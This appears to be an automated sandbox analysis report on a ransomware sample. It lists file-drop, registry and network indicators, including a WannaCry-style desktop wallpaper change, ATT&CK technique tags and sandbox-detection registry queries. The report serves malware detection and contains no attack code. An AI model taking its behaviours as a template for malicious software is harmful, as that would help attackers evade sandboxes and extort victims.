File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\A:	MBAMService.exe
File opened (read-only)	\??\J:	MBAMService.exe
File opened (read-only)	\??\K:	MBAMInstallerService.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\T:	MBAMInstallerService.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\P:	MBAMService.exe
File opened (read-only)	\??\Y:	MBAMService.exe
File opened (read-only)	\??\B:	MBAMInstallerService.exe
File opened (read-only)	\??\W:	MBAMInstallerService.exe
File opened (read-only)	\??\U:	MBAMInstallerService.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\Q:	MBAMService.exe
File opened (read-only)	\??\T:	MBAMService.exe
File opened (read-only)	\??\G:	MBAMInstallerService.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\W:	MBAMService.exe
File opened (read-only)	\??\X:	MBAMService.exe
File opened (read-only)	\??\M:	MBAMInstallerService.exe
File opened (read-only)	\??\Q:	MBAMInstallerService.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\M:	MBAMService.exe
File opened (read-only)	\??\L:	MBAMInstallerService.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\B:	MBAMService.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\H:	MBAMService.exe
File opened (read-only)	\??\H:	MBAMInstallerService.exe
File opened (read-only)	\??\O:	MBAMInstallerService.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\I:	MBAMService.exe
File opened (read-only)	\??\O:	MBAMService.exe
File opened (read-only)	\??\V:	MBAMService.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\N:	MBAMInstallerService.exe
File opened (read-only)	\??\Y:	MBAMInstallerService.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\E:	MBAMService.exe
File opened (read-only)	\??\N:	MBAMService.exe
File opened (read-only)	\??\S:	MBAMService.exe
File opened (read-only)	\??\X:	MBAMInstallerService.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

264 raw.githubusercontent.com
265 raw.githubusercontent.com
266 raw.githubusercontent.com
267 raw.githubusercontent.com

flow	ioc
264	raw.githubusercontent.com
265	raw.githubusercontent.com
266	raw.githubusercontent.com
267	raw.githubusercontent.com

Drops file in System32 directory 64 IoCs

Processes:

MBVpnTunnelService.exeDrvInst.exeMBAMService.exeMBAMService.exe

description	ioc	process
File created	C:\Windows\System32\DriverStore\FileRepository\netrasa.inf_amd64_f42f0f60460b8950\netrasa.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\SETEF54.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\bcmdhd64.inf_amd64_f35681ee9a022823\bcmdhd64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netloop.inf_amd64_ff4a06185491a88a\netloop.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8187se64.inf_amd64_99a4ca261f585f17\net8187se64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlane.inf_amd64_0d70dfdd3a576529\netrtwlane.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\nete1g3e.inf_amd64_af58b4e19562a3f9\nete1g3e.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwew01.inf_amd64_84bf249d7c59a58c\netwew01.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwtw04.inf_amd64_3487ae295af08a1f\netwtw04.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netk57a.inf_amd64_5a2c95e8a5a2ec07\netk57a.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netl1e64.inf_amd64_291f12bd323b3ff3\netl1e64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\e2xw10x64.inf_amd64_6cc2d8096601fa2c\e2xw10x64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net1yx64.inf_amd64_8604d8a50804b9c1\net1yx64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\nete1e3e.inf_amd64_27bfb60729304c27\nete1e3e.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwmbclass.inf_amd64_383eaad9c343710d\netwmbclass.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net819xp.inf_amd64_ded518ad79c316ac\net819xp.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\mbtun.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netbc64.inf_amd64_6c303885965f99b8\netbc64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\SETEF55.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net1ic64.inf_amd64_5d49cc27a6d05e5c\net1ic64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netbc63a.inf_amd64_7ba6c9cea77dd549\netbc63a.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netl1c63x64.inf_amd64_4d6630ce07a4fb42\netl1c63x64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_d271ba5a9c993ac3\netathr10x.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\rtwlanu_oldic.inf_amd64_64dc8ea3097dbbbf\rtwlanu_oldic.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlanu.inf_amd64_23f53da2fc1e1be5\netrtwlanu.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ndisimplatformmp.inf_amd64_165de0e69bb420c9\ndisimplatformmp.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlans.inf_amd64_809bf8dfa81c377b\netrtwlans.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\SETEF55.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\SETEF56.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net7800-x64-n650f.inf_amd64_387464037c2d56cf\net7800-x64-n650f.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netmlx5.inf_amd64_1c5d76930978e302\netmlx5.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtwlane_13.inf_amd64_f3d0d8bd79ab9a02\netrtwlane_13.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netax88772.inf_amd64_d2ca514cf72a9a18\netax88772.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwsw00.inf_amd64_24d55504ae3587aa\netwsw00.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8192se64.inf_amd64_167684f9283b4eca\net8192se64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netr7364.inf_amd64_310ee0bc0af86ba3\netr7364.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\usbnet.inf_amd64_c5a42cdc1adb9ade\usbnet.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netvf63a.inf_amd64_afddbbd6046998bc\netvf63a.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\rndiscmp.inf_amd64_68ba6e09a25225a9\rndiscmp.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\wceisvista.inf_amd64_08f6d3fc478987f0\wceisvista.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\rtux64w10.inf_amd64_5abd56c57baea010\rtux64w10.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msux64w10.inf_amd64_241e254b15720c14\msux64w10.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\bthpan.inf_amd64_59711c87047b3bee\bthpan.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{662152d5-515c-af4c-a693-9e910bf7f82d}\SETEF54.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwns64.inf_amd64_c9c15e7d233d6d5d\netwns64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\netg664.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netvwwanmp.inf_amd64_c2e5b727d1a623c7\netvwwanmp.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netmlx4eth63.inf_amd64_1494a807d41d4e3d\netmlx4eth63.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ykinx64.inf_amd64_9968491cd13abd17\ykinx64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netnvm64.inf_amd64_35bbbe80dec15683\netnvm64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netmyk64.inf_amd64_8d2331ef1f1a08cd\netmyk64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\wnetvsc.inf_amd64_6c5bf8ade5e3c31b\wnetvsc.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwlv64.inf_amd64_abe96c8dcb5b0eac\netwlv64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netathrx.inf_amd64_36d7b29d619a4ac6\netathrx.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msdri.inf_amd64_c82335b6cfcf830c\msdri.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netvwifimp.inf_amd64_356b66ad47b23393\netvwifimp.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netr28x.inf_amd64_72ff1ba7dcda290d\netr28x.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net8192su64.inf_amd64_66c8bfc7a4b1feed\net8192su64.PNF	MBVpnTunnelService.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Program Files directory 64 IoCs

Processes:

MBAMInstallerService.exeMBAMService.exe

description	ioc	process
File created	C:\Program Files\Malwarebytes\Anti-Malware\System.ServiceProcess.ServiceController.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\UIAutomationProvider.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Runtime.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Threading.AccessControl.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\arwlib.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Resources.Reader.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Security.SecureString.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\WindowsBase.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\System.Windows.Input.Manipulations.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ja\Microsoft.VisualBasic.Forms.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationNative_cor3.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hans\PresentationCore.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.IO.FileSystem.DriveInfo.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-crt-string-l1-1-0.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\clretwrc.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Net.Http.Json.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\BrowserSDKDLL.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.UI.Controls.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-libraryloader-l1-1-0.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Runtime.Serialization.Xml.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Security.Cryptography.Csp.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Threading.Tasks.Parallel.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Transactions.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\es\PresentationUI.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.CodeDom.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Windows.Presentation.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Diagnostics.StackTrace.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\System.DirectoryServices.Protocols.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\MBAMShim.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\PresentationCore.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\UIAutomationTypes.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\tr\System.Windows.Controls.Ribbon.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hans\WindowsBase.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hant\Microsoft.VisualBasic.Forms.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hant\ReachFramework.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Xml.XPath.XDocument.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Formats.Asn1.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Runtime.InteropServices.RuntimeInformation.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Security.Principal.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationFramework-SystemXmlLinq.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Drawing.Primitives.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\D3DCompiler_47_cor3.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\ko\UIAutomationClient.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\PresentationFramework-SystemData.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\System.Drawing.Design.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\UIAutomationClient.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Reflection.Extensions.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\de\UIAutomationClientSideProviders.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\es\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\wpfgfx_cor3.dll	MBAMInstallerService.exe
File opened for modification	C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json.bak	MBAMService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\de\System.Windows.Forms.Primitives.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Net.Ping.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\cs\UIAutomationClientSideProviders.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\Microsoft.Win32.Registry.AccessControl.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\zh-Hant\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\ig.exe	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.IO.Compression.ZipFile.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\System.Security.Cryptography.Algorithms.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\it\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\tr\UIAutomationClientSideProviders.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.28\tr\WindowsFormsIntegration.resources.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.28\api-ms-win-core-sysinfo-l1-1-0.dll	MBAMInstallerService.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\QRCoder.dll	MBAMInstallerService.exe

Drops file in Windows directory 8 IoCs

Processes:

MBVpnTunnelService.exeDrvInst.exeMBAMService.exeLogonUI.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\INF\setupapi.dev.log	MBVpnTunnelService.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	C:\Windows\ELAMBKUP\MbamElam.sys	MBAMService.exe
File created	C:\Windows\rescache\_merged\421858948\2704036608.pri	LogonUI.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6024 5396 WerFault.exe wanakiwi.exe
2408 5572 WerFault.exe wanakiwi.exe

pid	pid_target	process	target process
6024	5396	WerFault.exe	wanakiwi.exe
2408	5572	WerFault.exe	wanakiwi.exe

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

DrvInst.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MBAMService.exefirefox.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MBAMService.exe
